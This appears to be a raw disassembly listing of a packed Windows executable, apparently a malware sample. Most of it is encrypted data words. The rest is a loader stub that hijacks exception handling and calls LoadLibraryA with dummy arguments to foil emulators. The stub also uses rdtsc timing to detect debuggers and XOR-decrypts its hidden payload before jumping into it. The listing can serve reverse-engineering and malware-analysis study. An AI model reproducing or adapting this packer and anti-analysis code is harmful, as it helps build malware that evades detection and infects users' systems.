0AB57EF66h, 66EE7219h, 9E1082E4h, 9FF8BD58h dd 7B3894CEh, 0F6134C60h, 0BEC3C83Ch, 1E9513A7h, 1960E47Bh dd 10A0AFF9h, 5ED062B4h, 26010FECh, 53C5B87Ch, 0AC78DC64h dd 0FE319AF2h, 4E4DDF3Bh, 0AE609232h, 0E52CCA3Ch, 14B8C6F4h dd 60F0A709h, 7AB14E4h, 0F00706A1h, 7B874954h, 369E2229h dd 2EE052C4h, 0F6A88389h, 0E6CD4736h, 0E122FA5Ah, 78F89721h dd 86F8EADCh, 0E3BD714h, 68EDD0F4h, 84A024BCh, 0DEBE7757h dd 1BE79AC5h, 0D67E8289h, 0E80F364h, 6F0828E8h, 466EC7DEh dd 52E89A3Ah, 70C5D847h, 40983C44h, 0DF68241Fh, 338D8D1Ch dd 0CE40841Ch, 7378EA5Eh, 34789696h, 40D0C469h, 278BF404h dd 0D0670281h, 3620BA74h, 0A1633AACh, 0B838D761h, 0C638A21Ch dd 16019654h, 0C957E7BDh, 5645D733h, 0A2188ACAh, 0D525C234h dd 938242DCh, 4EF60A3Bh, 71B58176h, 88080791h, 0F660DA4Ch dd 48B16784h, 6C38C904h, 0A8281D51h, 0E5E3DC2Ch, 1B6B58A4h dd 5E9192FAh, 466FC7DEh, 52E89A3Ah, 71C5D847h, 40983C44h dd 0FB55B51Fh, 96084CD4h, 0A840B234h, 72B86BE4h, 3674A297h dd 4E77FFC6h, 5469232h, 45DD7C33h, 0B590344Ch, 0A934FA44h dd 2B85851Bh, 0C6389C24h, 8A30E254h, 34F8AA85h, 58D8CF41h dd 23EF20FCh, 0DE66FA91h, 1688DA6Ch, 4CB5B414h, 0C9756ED8h dd 239528EAh, 7F68EC74h, 189FA209h, 0E6732CBCh, 99658708h dd 99C8BA9Ch, 0E62AB29Bh, 0B947D6E5h, 4655E723h, 0F6289A3Ah dd 5606D244h, 24ED3B1Ah, 0F5B66B00h, 1302625Ch, 0CE768ABBh dd 0AC7B0A9Ch, 0C14C767Ch, 8160EA33h, 98183781h, 0E6D8CA3Ch dd 0AE927774h, 0CB6DB02Ah, 0E80044DCh, 0C3C42AB7h, 0FEC0E521h dd 7657550Ch, 92CBBA6Eh, 23EF7503h, 0DE66FA91h, 1689FA6Ch dd 0E7039D1h, 0BE65EFD6h, 559AA222h, 75D0BC43h, 0B3051844h dd 0D87C84h, 3411325Fh, 0EEED3FDBh, 0E80F252h, 69CD2A9Eh dd 4655E723h, 0B6289A3Ah, 0F415D240h, 0A392CACCh, 5EE67A2Bh dd 0AEACDF66h, 2E81B212h, 60C08C4Ch, 3E008915h, 36585227h dd 96BF170Eh, 11F2CA0Ah, 28A8A7F1h, 5EC83AACh, 0E81007E4h dd 0CCD029A4h, 0C8487CF1h, 86037C8Ch, 0DEE8B9C5h, 389D80B4h dd 7450F40Ch, 2E2D7F9Bh, 4EC03292h, 0F3496ACCh, 6568761h dd 536222CFh, 2E962A1Ah, 0A6EBE1DAh, 2EADAB5Eh, 21488C13h dd 38B857E1h, 66B82A9Ch, 0CFEF17D4h, 0D033717Bh, 0E478DBFCh dd 10A094D9h, 5D3482B4h, 0AE96DFE6h, 6526B212h, 39C85775h dd 0FF3A22A2h, 4958FF46h, 5469232h, 635A928Ch, 1EA63AE9h dd 0F34DCD06h, 8D0044DCh, 0B239AA1Ch, 5BF51576h, 36A82CB4h dd 1BE452C4h, 39D7DEAh, 0DE50F40Ch, 638BFA6Ch, 0B444DAA1h dd 2D109523h, 49CF5DEEh, 0C0507FC9h, 2EA01284h, 0D6DB3EB4h dd 1BE7283Dh, 0D67E8289h, 8E80F264h, 41080AE8h, 466DE7FEh dd 56E99A3Ah, 0E6E9DF5Eh, 839A0A58h, 5EE67A29h, 160B9E2Ch dd 7EEBB6E0h, 0BE1E403Dh, 9BBAC26Bh, 76DE6251h, 2BD73962h dd 0E66EF299h, 1E900254h, 0D33F69D8h, 8E364A41h, 0E638AA1Ch dd 3987EF20h, 36A81A8Fh, 0FE5057B0h, 2DEB6156h, 76DD49F3h dd 3D88CC53h, 0B281BB65h, 3F2326Ch, 0BE069A89h, 53ED2DE6h dd 2EA024BCh, 12D80ABCh, 0CEA8E4F8h, 4BCDB0EFh, 0E580C45Ch dd 0B9004C96h, 0E3556834h, 0D028AC34h, 4BE525EFh, 25983C44h dd 2AD142B4h, 338D8D9Fh, 0CE40841Ch, 7258EA5Ch, 3D77D599h dd 2E85ACCh, 4B02201h, 29D339D7h, 215087FFh, 9EE33A9Ah dd 0BDFC3A6Dh, 63BD5DD5h, 0FE70D46Ch, 43A89A8Ch, 0F365DFCAh dd 2C18BCC4h, 27D0823Ch, 9B70896Fh, 6A84FFA0h, 66396ACCh dd 15BB121Ch, 4E0EDCAFh, 85C6D2B5h, 0E657F2DAh, 9E103A9Ch dd 0B0A9B82Ch, 8B2BAACFh, 20BE5F55h, 1830536Ch, 1CEB2AA7h dd 0D6D057C9h, 0A36F0A4Ah, 5EE67A11h, 86087AECh, 0E517B451h dd 1F93B2A4h, 1598711Fh, 0FD387134h, 981F5A89h, 4ECDCB3Ch dd 1F90344Bh, 728CB195h, 0E9BDFBE0h, 4D389C0Ch, 0C84F4EE9h dd 9E2D318Ch, 99E064FBh, 90202F79h, 0DE508234h, 0E18A8E6Ch dd 4A02997Ch, 5AF3CDCh, 880F42A9h, 7267DA4Ch, 2EA0135Dh dd 66D84754h, 0CC55C9F4h, 0E504FF62h, 42C4DC56h, 0D3472AD0h dd 7EC65946h, 89DC1F85h, 6533D272h, 0FE9B3624h, 0D5F8314Bh dd 76E04EAFh, 45BF4DD1h, 30473EC9h, 7CB37994h, 8E6DD3C0h dd 0AD20A43Bh, 63D1C27Eh, 1EA63D88h, 0A9E04927h, 8E00F257h dd 3381421Ch, 43FB1DABh, 369E2558h, 9B4DBA92h, 33937503h dd 0DE66FDE0h, 1580B0E7h, 80EB3EEEh, 89FD835Fh, 0BE31C29Ch dd 0ACECD54Ch, 2DA01285h, 50E79209h, 6A581F4h, 7A488C13h dd 8B8F1A58h, 46B82A3Eh, 55F42459h, 80170289h, 0BE66D144h dd 0D96D6094h, 8A6DC14Bh, 96084CD3h, 897BB951h, 1DFBE550h dd 0D5B02295h, 0A27D63C0h, 0A120A43Bh, 0E659C7B9h, 86150174h dd 30C80C93h, 0ABFF4A65h, 0C6C42F13h, 0BEFBE254h, 2EB318Eh dd 9BCDBA94h, 1B217503h, 0DE66FDE0h, 166C7F63h, 0CBC332A4h dd 86CE5504h, 81A82717h, 0F6E3DA7Ah, 21AC55AFh, 66D8873Eh dd 9657B9F4h, 0D68C3923h, 0CE03F264h, 52FF299Eh, 4168E7D7h dd 0E67A9A3Ah, 0D19467BBh, 0B3670A4Ah, 5EE679E6h, 99C8FFB6h dd 0CE4005A1h, 6E4035Ch, 0C18C2294h, 767CDFC3h, 90A09204h dd 6DDDC529h, 95900274h, 15E33BEAh, 32E822D0h, 0FFC755E8h dd 0C84F36E9h, 35DF6F8Ch, 58DF8A41h, 3E9D89FCh, 5750F40Bh dd 20C8FAE9h, 75C0B9A4h, 0B0C79259h, 8538D014h, 0C05726C9h dd 13C96084h, 16D84ABCh, 81F8B586h, 5B48BA2Ch, 0CF0B0E2Ah dd 4BB28B7h, 7E7559C4h, 0C328AC4Ch, 0FEA45148h, 62173B83h dd 0B5B15E90h, 1387B9F7h, 0CE768D9Ch, 9ECD613Ch, 0D6B014ABh dd 8917AF96h, 0AE203B65h, 0E82D4A3Ch, 6C9C455Fh, 5E8F01A5h dd 713CF0EBh, 0C97155E3h, 18E50D1h, 12949173h, 4645F545h dd 59E78AFCh, 9CBBBDCBh, 76ACB0EDh, 2032A4h, 8A73AAEFh dd 5EB52530h, 7F68EC73h, 189FCE01h, 0CF61C7BCh, 9D1082DCh dd 0E07722A9h, 0AB259464h, 457E01D2h, 3CDB7696h, 4D6E5C00h dd 0BCE115ACh, 23980A7Ch, 0D7D042B4h, 0C85786AAh, 5BBFE5E7h dd 64ED1C2h, 31AFCA55h, 76E94049h, 0C474C204h, 19A7A014h dd 28ABFCE1h, 908BFACh, 8F05FAEBh, 86D0AA1Ch, 168F1DB1h dd 36A81A9Dh, 28943797h, 0F57DE695h, 0AC25A151h, 57F18E05h dd 2275CDA4h, 79F85CE3h, 880BF081h, 82ED534Ch, 0C6A024BBh dd 66D84AA5h, 0FF44E7A7h, 0A107DF47h, 7DF2970Ah, 16C843F4h dd 17860BA6h, 0D34FFF60h, 0FF888544h, 0CE67F595h, 5ED042A7h dd 0F35A1FBFh, 0BC2FC657h, 6F0ABA39h, 5BDC4BE2h, 21E83FABh dd 51C861ECh, 0E64A22C3h, 7BC30274h, 3DAB5BEEh, 0FC500291h dd 0AA51DC75h, 0FE158531h dd 0DE7EF2DBh, 7608AD3Bh, 0F5188AFCh, 0BF388151h, 58ED9D02h dd 28A946CBh, 0EF8A3AA5h, 0DB5CCB62h, 0A168BF2Bh, 0D148A16Ch dd 0EB8C1A43h, 0A82A3271h, 862CD02Ch, 0F1D7F30Eh, 70842009h dd 5ACCEBD4h, 8D6E0FF3h, 2E4AD272h, 18F0B7F1h, 0E804282h dd 26BD85BCh, 0A640841Eh, 67CEA5Dh, 69B148C0h, 499CCF33h dd 0C4749232h, 73A79D38h, 1EA63D00h, 0A9DCFE2Fh, 0B83F1E51h dd 44AD551Ch, 0A170D46Fh, 5E1D974Fh, 38E064FAh, 9D9E1F03h dd 26D3C202h, 0AD0CF593h, 0C7C032A4h, 0B0C71259h, 0E830C814h dd 0CDAA4FB3h, 0EE2512B2h, 667CCEB3h, 5E3B82F4h, 0D522EA7Ch dd 66819834h, 86B82A9Ch, 1C659D82h, 3528AC37h, 6A6F2DBCh dd 26980F94h, 61ACC73Dh, 1B857ADAh, 0CE768DA4h, 39F07FD1h dd 6CE122A2h, 89B85AA6h, 981B1C91h, 19A0493Ch, 1B26867Bh dd 56A23AACh, 0B17CC71Bh, 53C7AA2Ah, 0FE46D9DEh, 3957E20Fh dd 6EE5CD40h, 369D03FCh, 0ED50F40Bh, 474BF9A5h, 4AAA63F4h dd 0FA4D958Dh, 4130942Bh, 0C053BCD9h, 21609784h, 66DD3138h dd 17D9B1F4h, 0E0772EA9h, 5FD1A364h, 49B835F4h, 0EB0F32D4h dd 0B61EA1A2h, 6A6F12C1h, 26980F48h, 6148C73Dh, 2ECB7ADAh dd 0CE40C22Ch, 0F140A1D7h, 8888711h, 76E85ACCh, 0AD26E714h dd 0D048ADB9h, 1D423174h, 0A139CD6Dh, 2A85FB05h, 7E389C23h dd 0FE70CAFBh, 35945107h, 58F03541h, 0A5CAB9FCh, 29A135F5h dd 8A0D738Dh, 8DC0049Bh, 80B3DDD3h, 330541EDh, 4167C21Fh dd 0FEA306C7h, 4E1921F5h, 0A49152F7h, 0B821CD73h, 8D9D869Dh dd 34B926E6h, 42BBE934h, 0B53CD887h, 0AAEDC206h, 0FF6FF534h dd 0DBEB8397h, 963E457Ch, 0EA1439E7h, 89B8D94Ch, 3EB09A16h dd 0B96399CCh, 13AD99EFh, 0E66EF454h, 2D4F8988h, 37F49665h dd 0F43C7496h, 0E614A86Bh, 8A2CDEFEh, 42862660h, 1BE06E19h dd 2DD16914h, 8615FF35h, 1DFCFA29h, 1C836199h, 0B57D65DCh dd 35CF5DEBh, 0BF3FE74Fh, 0AAAF51CAh, 9927B59Ah, 0CB53D5C9h dd 0CDCCB562h, 337F0D9Bh, 748B69CBh, 81E0E6DBh, 0E61565F3h dd 0E12F8617h, 0D9670FF8h, 0B60B714Bh, 69F784C1h, 34A8A251h dd 0EE8715A0h, 0C14FDCB5h, 8804DEC3h, 7C136DFBh, 0E658DCD4h dd 0E1F3EA74h, 5620C553h, 0D30072E4h, 0F56B479Dh, 2599E262h dd 52A81A8Fh, 0DB6B603Bh, 0A62EB564h, 0B8724B50h, 4CC5C4EDh dd 4D04B7ABh, 0D8736ADCh, 0D8EEA128h, 0B338E1CDh, 2D14978Bh dd 252F4ABCh, 9E3082E2h, 71CDB52Ch, 0F880F267h, 49BA76DFh dd 7EF3FF50h, 0BE6B110Ch, 4EC07279h, 0A91C05DCh, 63D042B7h dd 0B6285ACCh, 0CDC4362Bh, 0BF90EA5Ch, 314FDD6Ah, 76EB234Eh dd 72851104h, 0E658FC03h, 959840FFh, 97E32AE6h, 4E337697h dd 0E3BAFF7h, 7760A8DDh, 97BA09h, 62AA51C4h, 0A7188A44h dd 4EB89334h, 2677058Bh, 78F89131h, 0B6D8DBDCh, 880806A1h dd 848B04Ch, 3AD84A4Dh, 993F3C54h, 91C2070Bh, 349B78B8h dd 36256755h, 0A3532AAAh, 4655E723h, 0B6289A3Ah, 0CC14D344h dd 1E3D8F8Bh, 5ED34282h, 9A7D7AECh, 0F6E517A5h, 0F987EA6Ah dd 345BD96Bh, 4E4DD74Dh, 0AE209232h, 0E030C23Ch, 47900274h dd 56C83CC4h, 0A6E82AE4h, 4CC755FBh, 0C8487FD1h, 1C2C9C8Ch dd 6ED66A59h, 9E850F74h, 3EB2C202h, 2E2D7F9Bh, 4EC83292h dd 8F8D6ADCh, 86AF1F94h, 8269DA7Ah, 8B25E541h, 66D87C84h dd 0EA1882F4h, 4BF53A37h, 0B80C45Ch, 0FB389AE8h, 7EC65A4Ah dd 368FEE09h, 0D8584DF9h, 0B8EC0F7Ch, 6675C743h, 96087ADAh dd 0C7343224h, 3EE557DCh, 49B222A2h, 964DD945h, 0AE20A43Bh dd 19ABCDD4h, 0E3F1EA8Bh, 2620C553h, 50072E6h, 0F0073681h dd 5EEDE154h, 0DEA82CB3h, 911FAEBDh, 0A4480EF3h, 6BDBC234h dd 16BEC5F4h, 4DFC6C2Fh, 7B828202h, 3C3F5DEBh, 0F668D876h dd 4E845805h, 0ED384ABCh, 9D46D00Ah, 0AC4BAE56h, 0AB050574h dd 46B81CA4h, 0BE062D4h, 52951318h, 6360E47Bh, 10A0BAC9h dd 395DC9B4h, 65084CFCh, 0E2F9E580h, 8B78EA56h, 8A02221h dd 0C74DA9CCh, 5D227104h, 43DD3D98h, 1E90344Ch, 59D83AACh dd 8E00DC60h, 0EE4B551Ch, 19E54BCh, 0E23D9173h, 0EBE064FBh dd 3E9C852Eh, 5550C234h, 20B762D9h, 5E8AB9A4h, 0E6DC205Dh dd 95D0A214h, 0F41BD206h, 5CA3DBB7h, 15571A8h, 1510B4E4h dd 0E058DDA1h, 85D68064h, 0E33B0EA0h, 7EC672B3h, 0D18F190Ch dd 0EE60D244h, 279070F7h, 0A9D34AFEh, 13838D6Bh, 0CE768D88h dd 3EDD6FABh, 3EF022A2h, 749C5ACCh, 0DC238AF3h, 6F68E330h dd 28AFE2C1h, 7EBBB1ACh, 0BF742E5h, 0C60E92B9h, 0FE70E214h dd 2E5F18F8h, 92A9BA95h, 4D417503h, 0F623C138h, 47848847h dd 1164C1F2h, 364DE785h, 3730942Ch, 0C0573EF1h, 7104E184h dd 0F4E945E2h, 9EC30579h, 4372BA2Ch, 0EB6CAC7h, 94D12CE9h dd 6CC434ACh, 5ED8CA84h, 119F08E4h, 2AD28126h, 0A9C008B7h dd 0A030DF69h, 0CE40B224h, 339674Ch, 0B33931E1h, 76DE652Ch dd 0BE471707h, 41DBCA0Ah, 1E900213h, 7E8B11ACh, 8E52F56Dh dd 43CFAA1Ch, 0FE46DE34h, 36A81A8Dh, 2D2755B0h, 6B82AF4h dd 7BD53594h, 1688CC54h, 3A4032A4h, 0FC1038DBh, 0E4CF5DE3h dd 0C98857C7h, 2B4312B2h, 8DF00135h, 429D09F9h, 35488C13h dd 85831966h, 0C34F02D7h, 7EC65A71h, 0B6289A0Fh, 6BEBC630h dd 26AE3598h, 6100CFB7h, 130B7ADAh, 0CE768DE8h, 4CF3E25Dh dd 0A235A984h, 4FE86CF3h, 0AD539A4Eh, 0E75080B5h, 7D131236h dd 0D3433AF4h, 8E364D40h, 0C6101A74h, 0F632E354h, 66EB1BD5h dd 5643C74Eh, 23EF8ACAh, 0DE66FA91h, 688FA6Ch, 0C3C334D0h dd 86CE7ABBh, 3BC7A2A2h, 0F65EE2E9h, 2EA21284h, 0A0265EC9h dd 0A6B50703h, 0D648BA1Ah, 8F5F260h, 7E1C9F16h, 0FB0762E2h dd 0B61EA2A9h, 0EE609244h, 21120109h, 5C7A80B6h, 7DFF983Ah dd 0FC47382Dh, 0D07A409Eh, 0EC83D576h, 12CAD1A8h, 2D78908Bh dd 0D067B681h, 9A9F0274h, 0A937C072h, 0B198C71Bh, 53C7AA2Ah dd 0FE46D986h, 93CAF73h, 0FB1F52F2h, 0A62EB1BAh, 0E1D04FB9h dd 8305FA5Ah, 4EF60D2Ch, 8692388Dh, 814C17EBh, 6397DA7Ah dd 2E962942h, 59A4FF43h, 0BEF82C2h, 0D67E816Ah, 30E847E9h dd 0F3472AAAh, 7EC65DACh, 74BD655Ah, 6D60E47Fh, 10A776D9h dd 0B61342B4h, 96087AECh, 4F41D879h, 304F5AB1h, 31407A94h dd 639CDF0Dh, 6EA59232h, 199049FFh, 9B510D84h, 56FE2FD8h dd 8E104F27h, 0DA4DAA36h, 0DA0C6332h, 43D97680h, 0AA0832D7h dd 0D3E77503h, 24842A31h, 0C4600593h, 2F3FCD5Bh, 0FED595F2h dd 6229642h, 0F668DA69h, 0D105FAE4h, 5FADB543h, 0AE34C67Fh dd 0E8200FA1h, 5E0BF252h, 7C394C94h, 5B8360D2h, 0B628F25Ah dd 2AEBD2BBh, 76CA0A16h, 62C2D74Bh, 528B7ADAh, 927E332Ch dd 7324D563h, 3A76A197h, 8912DB24h, 515F7AFBh, 253935C3h dd 1E9076CCh, 0EE79D1ACh, 8E0072CBh, 0C638B7F4h, 0FE502054h dd 36A82A34h, 6EF0BAC4h, 82DA8AFCh, 0DFD57A34h, 1560FA6Ch dd 8CC032A4h, 0D2756AF0h, 90FDAE30h, 8A6822CFh, 2E48729Dh dd 0EDD84ABCh, 0C320A6A0h, 3BC9A0A7h, 0EB6CAE3h, 0B9599074h dd 7A32032Bh, 0B72E990Ch, 0AC67D746h, 70E14F28h, 9415FF39h dd 90010011h, 0AE860h, 89E80000h, 0E9000000h, 30h, 36FF6467h dd 25310000h, 3143A041h, 26896467h, 0C9310000h, 6851h dd 51518000h dd 68h, 68515180h, 800h, 0C1E85151h, 3100007Fh, 0BCh, 0C029FC00h dd 0C008C8FEh, 0F8750474h, 0E867EBh, 5A000000h, 0FFB6EA81h dd 0C931FFFFh, 28B0F181h, 91BD0000h, 0FC000000h, 28652FCh dd 0FCE83166h, 83FC0286h, 834501C2h, 0C90901E9h, 645AEC75h dd 58Fh, 895D0000h, 61142454h, 9090E2FFh, 1024548Bh, 828FC031h dd 0B8h, 939279C3h, 931D9594h, 31365BCh, 9F9EB27Fh, 8B022157h dd 0A7A6A5A4h, 0F72129A8h, 88h, 19Eh dup(0) dd offset loc_3144A000 dd 1405h dup(0) ; --------------------------------------------------------------------------- push ebp mov ebp, esp call sub_31452017 call sub_314520A4 mov ebp, 12FFC0h ; DATA XREF: sub_31452017+6w jmp loc_3145205B ; =============== S U B R O U T I N E ======================================= sub_31452017 proc near ; CODE XREF: UPX2:31452003p var_48 = dword ptr -48h ; FUNCTION CHUNK AT 314520CE SIZE 000000A3 BYTES ; FUNCTION CHUNK AT 31452184 SIZE 0000004F BYTES push dword ptr fs:0 mov dword ptr ds:loc_3145200D+1, ebp mov fs:0, esp xor eax, eax push eax push eax push eax push 400h push eax push eax push 100h push eax push 1 call ds:dword_3143808C ; LoadLibraryA xor ecx, ecx push ecx push ecx push ecx push ecx push 80000000h push ecx push ecx push ecx push ecx call ds:dword_3143808C ; LoadLibraryA loc_3145205B: ; CODE XREF: UPX2:31452012j sub eax, eax loc_3145205D: ; CODE XREF: sub_31452017+4Cj dec al or al, al jz short loc_31452067 jnz short loc_3145205D jmp short loc_314520CE ; --------------------------------------------------------------------------- loc_31452067: ; CODE XREF: sub_31452017+4Aj call $+5 pop ebx sub ebx, 0FFFFFFBBh push ebx mov edx, 28B0h cld mov ecx, 88h loc_3145207F: ; CODE XREF: sub_31452017+7Dj xchg al, [ebx] xor ax, cx cld xchg al, [ebx] add ebx, 1 add cx, 0A0h sub edx, 1 or edx, edx jnz short loc_3145207F pop ebx mov ecx, [ebp-8] mov fs:0, ecx leave jmp ebx sub_31452017 endp ; sp-analysis failed ; --------------------------------------------------------------------------- align 4 ; =============== S U B R O U T I N E ======================================= sub_314520A4 proc near ; CODE XREF: UPX2:31452008p arg_C = dword ptr 10h mov edx, [esp+arg_C] xor eax, eax pop dword ptr [edx+0B8h] retn sub_314520A4 endp ; sp-analysis failed ; --------------------------------------------------------------------------- call $+5 mov eax, [esp] cld mov [eax+2FE3h], ebx test dword ptr [eax+28A0h], 80000000h mov ebx, [esp+4] ; START OF FUNCTION CHUNK FOR sub_31452017 loc_314520CE: ; CODE XREF: sub_31452017+4Ej jz short loc_314520FC pop ecx mov [eax+2FE7h], esi mov [eax+2FEBh], edi cmp byte ptr [eax+28A4h], 0E8h jnz short loc_314520F3 add ebx, [eax+28A5h] mov ebx, [ebx+2] push dword ptr [ebx] jmp short loc_314520FB ; --------------------------------------------------------------------------- loc_314520F3: ; CODE XREF: sub_31452017+CDj mov ebx, [eax+28A6h] push dword ptr [ebx] loc_314520FB: ; CODE XREF: sub_31452017+DAj pop ebx loc_314520FC: ; CODE XREF: sub_31452017:loc_314520CEj push ebp mov ebp, eax sub [esp+4Ch+var_48], 180B6h sub ebp, 361005h mov edi, [esp+4Ch+var_48] lea esi, [ebp+3638B0h] mov ecx, 0 rep movsb call sub_31452171 mov ecx, eax call sub_31452171 sub eax, ecx jz short loc_31452145 cmp eax, 100h ja short loc_31452145 lea eax, [ebp+3610D3h] mov dl, [eax-10h] call sub_31452175 jmp short loc_31452184 ; --------------------------------------------------------------------------- loc_31452145: ; CODE XREF: sub_31452017+115j ; sub_31452017+11Cj test dword ptr [ebp+3638A5h], 80000000h jz short loc_3145216F lea esi, [ebp+3638A9h] mov edi, [esp+4Ch+var_48] movsb movsd mov esi, [ebp+363FECh] mov edi, [ebp+363FF0h] mov ebx, [ebp+363FE8h] loc_3145216F: ; CODE XREF: sub_31452017+138j pop ebp retn ; END OF FUNCTION CHUNK FOR sub_31452017 ; =============== S U B R O U T I N E ======================================= sub_31452171 proc near ; CODE XREF: sub_31452017+107p ; sub_31452017+10Ep rdtsc retn sub_31452171 endp ; --------------------------------------------------------------------------- cmpsb ; =============== S U B R O U T I N E ======================================= sub_31452175 proc near ; CODE XREF: sub_31452017+127p mov dh, dl mov ecx, 27D2h loc_3145217C: ; CODE XREF: sub_31452175+Cj xor [eax], dl inc eax add dl, dh loop loc_3145217C retn sub_31452175 endp ; --------------------------------------------------------------------------- ; START OF FUNCTION CHUNK FOR sub_31452017 loc_31452184: ; CODE XREF: sub_31452017+12Cj daa scasd repne push 4B0B1BC1h ; CODE XREF: sub_31452017+19Bj cwde sub [edx-5Fh], cl sbb eax, 0EDE1B260h lodsb push ebx clc sahf xor ds:0C1DFF51Bh, eax adc al, 0A8h cmc and dl, [eax-2CA186DDh] scasb fmul qword ptr [ecx+23h] sbb eax, 6403C24Eh int 3 ; Trap to Debugger jns short near ptr loc_31452186+1 xchg eax, edi rcl dword ptr [ecx], 7Bh cmp [ebp-337DAD2Eh], al aaa loope near ptr loc_314521CE+2 dec esp fucomip st, st(7) inc ebp lea edx, [esi] insb mov ebx, 0BE9E086h aas loc_314521CE: ; CODE XREF: sub_31452017+1A8j mov eax, [edx+ecx*8+1Fh] dec eax ; END OF FUNCTION CHUNK FOR sub_31452017 ; --------------------------------------------------------------------------- db 0C4h dd 77212FDFh, 9B24C0A9h, 530140CCh, 431DC0C5h, 0D83E6415h dd 1C89247Eh, 4007CF79h, 0CC9E3ACFh, 0C7C1EC23h, 96AF0D08h dd 80C22A4Dh, 5AB403h, 0F9973EE5h, 46CF814Ah, 895612B3h dd 0B645476Eh, 0C318298Fh, 9D0244A8h, 6F82DC36h, 0A15600ABh dd 2AF77815h, 0F038CB8Ch, 134C3C5h, 16419AABh, 0BBD184C6h dd 902F045Eh, 174118F9h, 7F8ACB71h, 2E4982B3h, 0BFCAE1BEh dd 48A17DD3h, 0CC8714EEh, 79D21A93h, 0A595D06Bh, 0A834635Eh dd 55B679B0h, 5DBD8CD0h, 70FC31FAh, 0ADE1BBFDh, 0A0CC412Ah dd 4C376F46h, 0D02AB2CBh, 7DBAB9F5h, 835AB438h, 0AEE73003h dd 0F6DDE43Eh, 0FE30AD53h, 0D533156Eh, 0F8649754h, 851AF113h dd 0E1B1DC00h, 0FB44C943h, 78030C50h, 0F0492816h, 1D1D6396h dd 204CEFB0h, 0B70D8407h, 50AAD0DAh, 0FC0517F6h, 43D974E4h dd 1862CC4Eh, 0E68FEDB6h, 20A2CA6Dh, 0E03AE4E7h, 0ED2D2CECh dd 105CFFC8h, 2C0D9C33h, 409AF6A0h, 0D8870171h, 0FBCA126Eh dd 46105F9h, 4D7B54AEh, 38A4FC46h, 0C27B1153h, 0CD311C40h dd 0ECD956F1h, 0F20EC786h, 694AD736h, 0D31BE95Bh, 0CB491458h dd 0AFDB508Dh, 8CADBA8Eh, 2881B461h, 55E574CFh, 58843730h dd 756A607Dh, 17663356h, 0B77AD42Ch, 0B9786CACh, 50AE0436h dd 0E842F476h, 1525348Fh, 1844F770h, 3405A43Bh, 48A2FED4h dd 886A9484h, 78D62C86h, 0F8ABC474h, 0A9680BBAh, 409B9C1Eh dd 4DCD8CE7h, 70FC1F28h, 962B67Eh, 0F66FABAEh, 0D092DA7Dh dd 0D02A84DBh, 68C04D9Fh, 595ADE0Eh, 92984645h, 0B4071C1h dd 39C97CE0h, 160797ADh, 0F8529A3Dh, 92DEC091h, 2E6ADC36h dd 8E1A74CEh, 14FE4832h, 62DF5BFEh, 5E20AADh, 166D1E9Bh dd 35DB5FC6h, 6691DAE3h, 7B4C2DF6h, 80D84066h, 0ACF4F26h dd 0B00A5282h, 4AA27859h, 65B194EEh, 78E41764h, 9F6BB4E1h dd 9E35A033h, 0BA1F7F4Eh, 2732BADDh, 0F545250Eh, 854845Fh dd 9B1CD125h, 486DEC70h, 80AF0BDFh, 0E3C22A4Eh, 36615E83h dd 67E8AFA6h, 0B505E54Fh, 0C814448Bh, 5B4899E5h, 0F1B1AC30h dd 1FEB3561h, 1EBAB6B3h, 0C1A29CCEh, 0E53F0C66h, 0F07C9896h dd 8888F31Dh, 50850DD8h, 0BBF3EFC2h, 0A9A94434h, 8242F6A1h dd 576FB996h, 0A172FA33h, 0B00A64A7h, 0B6EFF8DBh, 86C56B11h dd 35D6A12Dh, 106AC41Eh, 0EF8FF7D0h, 0A4A85F4Ah, 0E326196Bh dd 16662448h, 0A304BE9Fh, 42F8962Dh, 524667B3h, 0A023ECDEh dd 0A4491C76h, 0C4D1B464h, 989A4CCCh, 5A82E43Eh, 0A2702D96h dd 0F5454460h, 0F86497E8h, 0D02EC7C6h, 28F2D55Eh, 0AACEFFCEh dd 327E8766h, 9A4ACEBEh, 88886E94h, 200ADD46h, 0E91206C6h dd 0AFFAFB34h, 0DE796A63h, 5836B8Eh, 1FF6C3D9h, 3D0A64BFh dd 7EB2FCE3h, 0EC392DEEh, 97592C86h, 0FDEB61EDh, 0A8344CB6h dd 54AD71C3h, 38CD8CD0h, 50A0702Eh, 9D9D437Ch, 0A0CC6F50h dd 4DCD2CC3h, 0D1646CEAh, 792A1C76h, 535AB40Eh, 0FA9708C3h dd 42DA834Bh, 0A44B0ABFh, 60DF730Bh, 0FD1D4451h, 2515449Eh dd 28B4E35Ah, 0FB98E131h, 0A7E50C50h, 0C671E26Bh, 0E2E25696h dd 56EF2B2Ch, 1125AFDh, 50AA0576h, 61A3B761h, 0D78E1082h dd 23C859D9h, 46396488h, 74F459D5h, 0B43A94D8h, 0C647D3D1h dd 956AF225h, 0EE642876h, 329E0ACDh, 0FC467308h, 1ACA4E76h dd 0BEF7433Ch, 25FA6295h, 0AB4E9886h, 0D02F0336h, 0F90B2F76h dd 85638EEDh, 98C470F0h, 4C0BD64Bh, 0BB4158F2h, 48CE671Ch dd 0F6CF6D87h, 0C4BA449Eh, 78D38A66h, 55E5279Eh, 58843708h dd 8413647Bh, 0AC96C399h, 76FF5B26h, 50125AFAh, 0AF55F99Bh dd 0AED763A5h, 6BDA02B5h, 30B64DA8h, 0E70A64BFh, 73E469A9h dd 75C594D8h, 78E417C0h, 0EF91ACF7h, 0C2585C49h, 2A9A9E4Eh dd 0B032E6E6h, 70CE247Fh, 808789Dh, 2BF63EFEh, 6E701382h dd 0D01EDBA6h, 800B2F76h, 0FFA54BD4h, 8DB4D92Bh, 61D8E408h dd 5DDD2C87h, 608C2F24h, 3B726885h, 0C8B21C0Eh, 28B2D536h dd 0C0141CCEh, 58B20D66h, 0F04AA4FEh, 88E23C96h, 2052712Eh dd 0B8126CC6h, 3FC555Eh, 0D3100909h, 0D97134B8h, 6DB2488Ah dd 73E48645h, 51D369DBh, 1F6894D8h, 4EE98613h, 7CEF4D1Eh dd 40026A89h, 409AF458h, 0B35DE3AAh, 29A540Bh, 640BCA7Fh dd 0F69F33CBh, 5DE78027h, 2F7A849Fh, 5EF94EE3h, 70DF3D0Eh dd 5BF27A99h, 43EBA662h, 0A54332B3h, 2F5700Bh, 8C31C96Ch dd 0E4BC18EDh, 5CE1B965h, 0B46918CEh, 36D76014h, 9538E7FEh dd 0CE8748F7h, 611FB847h, 0DD602FC6h, 16CF703Fh, 0A527F09Fh dd 0E9AA44EFh, 1833AB48h, 0D16F16FDh, 3AF29922h, 935FF781h dd 3BD26DF5h, 640BA16Ch, 0C5670ED3h, 14FF8021h, 0B957FE8Eh dd 289241Ah, 6D16DD73h, 0C5883CFAh, 